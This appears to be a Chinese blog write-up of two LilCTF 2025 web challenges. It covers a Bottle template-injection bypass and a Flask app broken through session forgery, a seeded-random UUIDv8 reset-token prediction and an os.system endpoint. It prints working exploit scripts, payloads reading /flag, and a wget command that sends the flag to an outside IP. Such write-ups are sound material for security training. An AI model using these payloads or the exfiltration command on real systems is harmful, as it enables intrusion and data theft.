Lilctf


https://blog.rkk.moe/2025/08/18/LilCTF-2025-Writeup/#Web


ez_bottle

from bottle import route, run, template, post, request, static_file, error
import os
import zipfile
import hashlib
import time

# hint: flag in /flag , have a try

UPLOAD_DIR = os.path.join(os.path.dirname(__file__), 'uploads')
os.makedirs(UPLOAD_DIR, exist_ok=True)

STATIC_DIR = os.path.join(os.path.dirname(__file__), 'static')
MAX_FILE_SIZE = 1 * 1024 * 1024

BLACK_DICT = ["{", "}", "os", "eval", "exec", "sock", "<", ">", "bul", "class", "?", ":", "bash", "_", "globals",
              "get", "open"]


def contains_blacklist(content):
    return any(black in content for black in BLACK_DICT)


def is_symlink(zipinfo):
    return (zipinfo.external_attr >> 16) & 0o170000 == 0o120000


def is_safe_path(base_dir, target_path):
    return os.path.realpath(target_path).startswith(os.path.realpath(base_dir))


@route('/')
def index():
    return static_file('index.html', root=STATIC_DIR)


@route('/static/<filename>')
def server_static(filename):
    return static_file(filename, root=STATIC_DIR)


@route('/upload')
def upload_page():
    return static_file('upload.html', root=STATIC_DIR)


@post('/upload')
def upload():
    zip_file = request.files.get('file')
    if not zip_file or not zip_file.filename.endswith('.zip'):
        return 'Invalid file. Please upload a ZIP file.'

    if len(zip_file.file.read()) > MAX_FILE_SIZE:
        return 'File size exceeds 1MB. Please upload a smaller ZIP file.'

    zip_file.file.seek(0)

    current_time = str(time.time())
    unique_string = zip_file.filename + current_time
    md5_hash = hashlib.md5(unique_string.encode()).hexdigest()
    extract_dir = os.path.join(UPLOAD_DIR, md5_hash)
    os.makedirs(extract_dir)

    zip_path = os.path.join(extract_dir, 'upload.zip')
    zip_file.save(zip_path)

    try:
        with zipfile.ZipFile(zip_path, 'r') as z:
            for file_info in z.infolist():
                if is_symlink(file_info):
                    return 'Symbolic links are not allowed.'

                real_dest_path = os.path.realpath(os.path.join(extract_dir, file_info.filename))
                if not is_safe_path(extract_dir, real_dest_path):
                    return 'Path traversal detected.'

            z.extractall(extract_dir)
    except zipfile.BadZipFile:
        return 'Invalid ZIP file.'

    files = os.listdir(extract_dir)
    files.remove('upload.zip')

    return template("文件列表: {{files}}\n访问: /view/{{md5}}/{{first_file}}",
                    files=", ".join(files), md5=md5_hash, first_file=files[0] if files else "nofile")


@route('/view/<md5>/<filename>')
def view_file(md5, filename):
    file_path = os.path.join(UPLOAD_DIR, md5, filename)
    if not os.path.exists(file_path):
        return "File not found."

    with open(file_path, 'r', encoding='utf-8') as f:
        content = f.read()

    if contains_blacklist(content):
        return "you are hacker!!!nonono!!!"

    try:
        return template(content)
    except Exception as e:
        return f"Error rendering template: {str(e)}"


@error(404)
def error404(error):
    return "bbbbbboooottle"


@error(403)
def error403(error):
    return "Forbidden: You don't have permission to access this resource."


if __name__ == '__main__':
    run(host='0.0.0.0', port=5000, debug=False)
% import fileinput
% m = ''.join(fileinput.input('/flag'))
% raise Exception(m)
#% print(m)没成功

fileinput 是 Python 自带库,不含黑名单关键字;fileinput.input(‘/flag’) 在库内部会打开文件(不要求你在模板里写 open),join 拼成字符串;
raise Exception(m) 没有下划线和冒号;后端会捕获异常并把消息 m(也就是 flag)回显在页面上。这正是 /view 路由的行为。

curl -F "file=@x.zip" http://challenge.xinshi.fun:47328/upload

Error rendering template: LILCTF{b0t71e_ha5_63En_ReCycIeD}

或者

二次包含。先上传一个已知路径的文件,再 include 即可.

脚本是ai编写的。

import requests  # 导入requests库,用于发送HTTP请求(如上传文件、访问URL)
import zipfile   # 导入zipfile库,用于创建和处理ZIP压缩文件
import os        # 导入os库,用于文件操作(如创建、删除文件)
import re        # 导入re库,用于正则表达式匹配(如提取响应中的MD5值)
import sys       # 导入sys库,用于系统级操作(如退出程序)


TARGET_URL = "http://challenge.xinshi.fun:35684"  # 目标服务器URL(漏洞测试对象)

def create_zip(filename, content):
 """辅助函数:创建包含指定内容的ZIP压缩文件。"""
 # 1. 先创建一个文本文件,写入指定内容
 with open(filename, "w") as f:
     f.write(content)
 # 2. 定义ZIP文件路径:将文本文件的后缀名从.txt改为.zip
 zip_path = filename.replace('.txt', '.zip')
 # 3. 创建ZIP文件,并将刚才的文本文件添加到ZIP中
 with zipfile.ZipFile(zip_path, 'w') as zf:
     zf.write(filename)
 # 4. 返回创建好的ZIP文件路径
 return zip_path

def upload_and_get_md5(zip_path):
 """辅助函数:上传ZIP文件,并从响应中解析出MD5值。"""
 try:
     # 1. 以二进制模式打开ZIP文件,准备上传
     with open(zip_path, 'rb') as f:
         # 构造文件上传参数:键为'file',值包含文件名、文件对象、MIME类型(application/zip)
         files = {'file': (os.path.basename(zip_path), f, 'application/zip')}
         # 发送POST请求到目标服务器的/upload接口,上传ZIP文件
         response = requests.post(f"{TARGET_URL}/upload", files=files)

     # 2. 检查上传请求是否成功(HTTP状态码是否为200)
     if response.status_code != 200:
         print(f"[!] {zip_path} 上传失败,状态码:{response.status_code}")
         return None

     # 3. 用正则表达式从响应文本中提取MD5值(匹配32位小写字母+数字的字符串)
     # 响应中通常包含类似"/view/abc123def456.../"的内容,MD5值就是中间的32位字符
     match = re.search(r'/view/([a-f0-9]{32})/', response.text)
     if not match:
         print(f"[!] 无法从 {zip_path} 的响应中解析出MD5值!")
         print(f"    原始响应:{response.text}")
         return None

     # 4. 返回提取到的MD5值(正则匹配结果的第1个分组)
     return match.group(1)
 # 捕获网络请求相关异常(如连接超时、服务器无响应等)
 except requests.exceptions.RequestException as e:
     print(f"[!] 上传 {zip_path} 时发生网络错误:{e}")
     return None

# --- 攻击流程 ---

# 1. 第一步:上传恶意载荷文件(包含攻击代码的文件)
print("[*] 步骤1:准备并上传恶意载荷文件...")
payload_filename = "payload.txt"  # 恶意载荷文件名
# 恶意载荷内容:利用模板注入漏洞执行系统命令(读取/flag文件内容)
# {{...}} 是模板引擎语法,__import__('os') 动态导入os模块,popen('cat /flag') 执行读flag命令
payload_content = "{{__import__('os').popen('cat /flag').read()}}"
# 创建包含恶意载荷的ZIP文件
payload_zip_path = create_zip(payload_filename, payload_content)
print(f"[+] 已创建载荷ZIP文件 '{payload_zip_path}'。")

# 上传恶意载荷ZIP,并获取其对应的MD5值(用于后续访问该文件的路径)
md5_payload = upload_and_get_md5(payload_zip_path)
if not md5_payload:  # 若获取MD5失败,退出程序
 sys.exit(1)
print(f"[+] 恶意载荷上传成功。MD5值:{md5_payload}")

# 2. 第二步:上传触发文件(用于触发恶意载荷执行的文件)
print("\n[*] 步骤2:构造并上传触发文件...")
trigger_filename = "trigger.txt"  # 触发文件名

# 触发文件内容:使用模板引擎的%include语法,包含已上传的恶意载荷文件
# 路径格式:uploads/[载荷MD5值]/[载荷文件名],这样访问触发文件时会自动执行载荷
trigger_content = f"%include('uploads/{md5_payload}/{payload_filename}')"
# ==========================================================================
print(f"[+] 触发文件内容为:{trigger_content}")

# 创建包含触发逻辑的ZIP文件
trigger_zip_path = create_zip(trigger_filename, trigger_content)
print(f"[+] 已创建触发ZIP文件 '{trigger_zip_path}'。")

# 上传触发文件ZIP,并获取其对应的MD5值
md5_trigger = upload_and_get_md5(trigger_zip_path)
if not md5_trigger:  # 若获取MD5失败,退出程序
 sys.exit(1)
print(f"[+] 触发文件上传成功。MD5值:{md5_trigger}")

# 3. 第三步:访问触发文件URL,获取flag(执行恶意载荷)
print("\n[*] 步骤3:访问触发文件URL以获取flag...")
# 构造访问触发文件的URL:格式为 目标URL/view/[触发文件MD5值]/[触发文件名]
flag_url = f"{TARGET_URL}/view/{md5_trigger}/{trigger_filename}"
print(f"[+] 最终请求URL:{flag_url}")

try:
 # 发送GET请求访问触发文件,此时服务器会解析触发文件,执行其中包含的恶意载荷
 flag_response = requests.get(flag_url)
 # 检查响应是否成功,且内容中不包含"Error"(排除错误情况)
 if flag_response.status_code == 200 and "Error" not in flag_response.text:
     print("\n" + "="*40)
     print("🎉 成功获取到Flag! 🎉")
     print(f"Flag内容:{flag_response.text.strip()}")  # 输出获取到的flag
     print("="*40 + "\n")
 else:
     print(f"[!] 获取flag失败。服务器状态码:{flag_response.status_code}")
     print(f"    服务器响应:{flag_response.text.strip()}")
# 捕获访问触发文件时的网络异常
except requests.exceptions.RequestException as e:
 print(f"[!] 获取flag时发生网络错误:{e}")
 sys.exit(1)
finally:
 # 4. 清理操作:删除本地创建的临时文件(避免残留)
 print("[*] 清理本地临时文件...")
 # 遍历所有临时文件(载荷文本、载荷ZIP、触发文本、触发ZIP)
 for f in [payload_filename, payload_zip_path, trigger_filename, trigger_zip_path]:
     if os.path.exists(f):  # 若文件存在,则删除
         os.remove(f)
 print("[+] 清理完成。")

Ekko_note

# -*- encoding: utf-8 -*-
'''
@File    :   app.py
@Time    :   2066/07/05 19:20:29
@Author  :   Ekko exec inc. 某牛马程序员 
'''
import os
import time
import uuid
import requests

from functools import wraps
from datetime import datetime
from secrets import token_urlsafe
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, render_template, redirect, url_for, request, flash, session

SERVER_START_TIME = time.time()


# 欸我艹这两行代码测试用的忘记删了,欸算了都发布了,我们都在用力地活着,跟我的下班说去吧。
# 反正整个程序没有一个地方用到random库。应该没有什么问题。
import random
random.seed(SERVER_START_TIME)


admin_super_strong_password = token_urlsafe()
app = Flask(__name__)
app.config['SECRET_KEY'] = 'your-secret-key-here'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///site.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False

db = SQLAlchemy(app)

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(20), unique=True, nullable=False)
    email = db.Column(db.String(120), unique=True, nullable=False)
    password = db.Column(db.String(60), nullable=False)
    is_admin = db.Column(db.Boolean, default=False)
    time_api = db.Column(db.String(200), default='https://api.uuni.cn//api/time')


class PasswordResetToken(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
    token = db.Column(db.String(36), unique=True, nullable=False)
    used = db.Column(db.Boolean, default=False)


def padding(input_string):
    byte_string = input_string.encode('utf-8')
    if len(byte_string) > 6: byte_string = byte_string[:6]
    padded_byte_string = byte_string.ljust(6, b'\x00')
    padded_int = int.from_bytes(padded_byte_string, byteorder='big')
    return padded_int

with app.app_context():
    db.create_all()
    if not User.query.filter_by(username='admin').first():
        admin = User(
            username='admin',
            email='admin@example.com',
            password=generate_password_hash(admin_super_strong_password),
            is_admin=True
        )
        db.session.add(admin)
        db.session.commit()

def login_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('请登录', 'danger')
            return redirect(url_for('login'))
        return f(*args, **kwargs)
    return decorated_function

def admin_required(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        if 'user_id' not in session:
            flash('请登录', 'danger')
            return redirect(url_for('login'))
        user = User.query.get(session['user_id'])
        if not user.is_admin:
            flash('你不是admin', 'danger')
            return redirect(url_for('home'))
        return f(*args, **kwargs)
    return decorated_function

def check_time_api():
    user = User.query.get(session['user_id'])
    try:
        response = requests.get(user.time_api)
        data = response.json()
        datetime_str = data.get('date')
        if datetime_str:
            print(datetime_str)
            current_time = datetime.fromisoformat(datetime_str)
            return current_time.year >= 2066
    except Exception as e:
        return None
    return None
@app.route('/')
def home():
    return render_template('home.html')

@app.route('/server_info')
@login_required
def server_info():
    return {
        'server_start_time': SERVER_START_TIME,
        'current_time': time.time()
    }
@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        username = request.form.get('username')
        email = request.form.get('email')
        password = request.form.get('password')
        confirm_password = request.form.get('confirm_password')

        if password != confirm_password:
            flash('密码错误', 'danger')
            return redirect(url_for('register'))

        existing_user = User.query.filter_by(username=username).first()
        if existing_user:
            flash('已经存在这个用户了', 'danger')
            return redirect(url_for('register'))

        existing_email = User.query.filter_by(email=email).first()
        if existing_email:
            flash('这个邮箱已经被注册了', 'danger')
            return redirect(url_for('register'))

        hashed_password = generate_password_hash(password)
        new_user = User(username=username, email=email, password=hashed_password)
        db.session.add(new_user)
        db.session.commit()

        flash('注册成功,请登录', 'success')
        return redirect(url_for('login'))

    return render_template('register.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')

        user = User.query.filter_by(username=username).first()
        if user and check_password_hash(user.password, password):
            session['user_id'] = user.id
            session['username'] = user.username
            session['is_admin'] = user.is_admin
            flash('登陆成功,欢迎!', 'success')
            return redirect(url_for('dashboard'))
        else:
            flash('用户名或密码错误!', 'danger')
            return redirect(url_for('login'))

    return render_template('login.html')

@app.route('/logout')
@login_required
def logout():
    session.clear()
    flash('成功登出', 'info')
    return redirect(url_for('home'))

@app.route('/dashboard')
@login_required
def dashboard():
    return render_template('dashboard.html')

@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
    if request.method == 'POST':
        email = request.form.get('email')
        user = User.query.filter_by(email=email).first()
        if user:
            # 选哪个UUID版本好呢,好头疼 >_<
            # UUID v8吧,看起来版本比较新
            token = str(uuid.uuid8(a=padding(user.username))) # 可以自定义参数吗原来,那把username放进去吧
            reset_token = PasswordResetToken(user_id=user.id, token=token)
            db.session.add(reset_token)
            db.session.commit()
            # TODO:写一个SMTP服务把token发出去
            flash(f'密码恢复token已经发送,请检查你的邮箱', 'info')
            return redirect(url_for('reset_password'))
        else:
            flash('没有找到该邮箱对应的注册账户', 'danger')
            return redirect(url_for('forgot_password'))

    return render_template('forgot_password.html')

@app.route('/reset_password', methods=['GET', 'POST'])
def reset_password():
    if request.method == 'POST':
        token = request.form.get('token')
        new_password = request.form.get('new_password')
        confirm_password = request.form.get('confirm_password')

        if new_password != confirm_password:
            flash('密码不匹配', 'danger')
            return redirect(url_for('reset_password'))

        reset_token = PasswordResetToken.query.filter_by(token=token, used=False).first()
        if reset_token:
            user = User.query.get(reset_token.user_id)
            user.password = generate_password_hash(new_password)
            reset_token.used = True
            db.session.commit()
            flash('成功重置密码!请重新登录', 'success')
            return redirect(url_for('login'))
        else:
            flash('无效或过期的token', 'danger')
            return redirect(url_for('reset_password'))

    return render_template('reset_password.html')

@app.route('/execute_command', methods=['GET', 'POST'])
@login_required
def execute_command():
    result = check_time_api()
    if result is None:
        flash("API死了啦,都你害的啦。", "danger")
        return redirect(url_for('dashboard'))

    if not result:
        flash('2066年才完工哈,你可以穿越到2066年看看', 'danger')
        return redirect(url_for('dashboard'))

    if request.method == 'POST':
        command = request.form.get('command')
        os.system(command) # 什么?你说安全?不是,都说了还没完工催什么。
        return redirect(url_for('execute_command'))

    return render_template('execute_command.html')

@app.route('/admin/settings', methods=['GET', 'POST'])
@admin_required
def admin_settings():
    user = User.query.get(session['user_id'])
    
    if request.method == 'POST':
        new_api = request.form.get('time_api')
        user.time_api = new_api
        db.session.commit()
        flash('成功更新API!', 'success')
        return redirect(url_for('admin_settings'))

    return render_template('admin_settings.html', time_api=user.time_api)

if __name__ == '__main__':
    app.run(debug=False, host="0.0.0.0")
可以直接flask的session伪造
python3 flask_session_cookie_manager3.py decode -s 'your-secret-key-here' -c 'eyJpc19hZG1pbiI6ZmFsc2UsInVzZXJfaWQiOjIsInVzZXJuYW1lIjoicTFuOSJ9.aKL9jg.4YZtvjn4aoY2Gxe5BMH6XFOPaGo'

{'is_admin': False, 'user_id': 2, 'username': 'q1n9'}
python3 flask_session_cookie_manager3.py encode -s 'your-secret-key-here' -t "{'is_admin': True, 'user_id': 1, 'username': 'admin'}"

eyJpc19hZG1pbiI6dHJ1ZSwidXNlcl9pZCI6MSwidXNlcm5hbWUiOiJhZG1pbiJ9.aKMCDg.4_ZSgiWQQ8x9Zhs6rkS2KfwE0Jg

然后成功登录到admin界面,发现有个可以更改实际API的,于是借服务器改一下。

{"date": "2067-01-01T00:00:00"}
wget http://47.104.246.82:7777/$(cat /flag)

#$(cat /flag) 是 命令替换语法(在 Linux/bash 中,$(...) 会先执行括号内的命令,并将结果作为字符串替换到原命令中)。

uuid8:

看我找到了什么(当当当)聊聊python中的UUID安全 - LamentXU - 博客园

def uuid8(a=None, b=None, c=None):
    """Generate a UUID from three custom blocks.

    * 'a' is the first 48-bit chunk of the UUID (octets 0-5);
    * 'b' is the mid 12-bit chunk (octets 6-7);
    * 'c' is the last 62-bit chunk (octets 8-15).

    When a value is not specified, a pseudo-random value is generated.
    """
    if a is None:
        import random
        a = random.getrandbits(48)
    if b is None:
        import random
        b = random.getrandbits(12)
    if c is None:
        import random
        c = random.getrandbits(62)
    int_uuid_8 = (a & 0xffff_ffff_ffff) << 80
    int_uuid_8 |= (b & 0xfff) << 64
    int_uuid_8 |= c & 0x3fff_ffff_ffff_ffff
    # by construction, the variant and version bits are already cleared
    int_uuid_8 |= _RFC_4122_VERSION_8_FLAGS
    return UUID._from_int(int_uuid_8)

而且服务器直接用

import random
random.seed(SERVER_START_TIME)

@app.route('/server_info')
@login_required
def server_info():
    return {
        'server_start_time': SERVER_START_TIME,
        'current_time': time.time()
    }

固定了种子,而 SERVER_START_TIME 又能通过 /server_info 拿到,所以我们先注册一个拿到seed再发送邮件复现admin的tooken即可。

因为 token 生成时只有 a=padding(username) 是固定的,

bc 都是 random.getrandbits()

所以只要 seed 一致,随机序列一致,你生成出来的 token 就是服务器那一个。

因此直接有poc

import random, uuid

SERVER_START_TIME = 1756893207.233193
random.seed(SERVER_START_TIME)


def padding(input_string: str) -> int:
    byte_string = input_string.encode('utf-8')
    if len(byte_string) > 6:
        byte_string = byte_string[:6]
    padded_byte_string = byte_string.ljust(6, b'\x00')
    return int.from_bytes(padded_byte_string, byteorder='big')


token = uuid.uuid8(a=padding("admin"))
print(token)

必须3.14的python才行(支持uuid8)

然后用admin@example.com重置密码+tooken登上admin



文章作者: q1n9
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 q1n9 !
  目录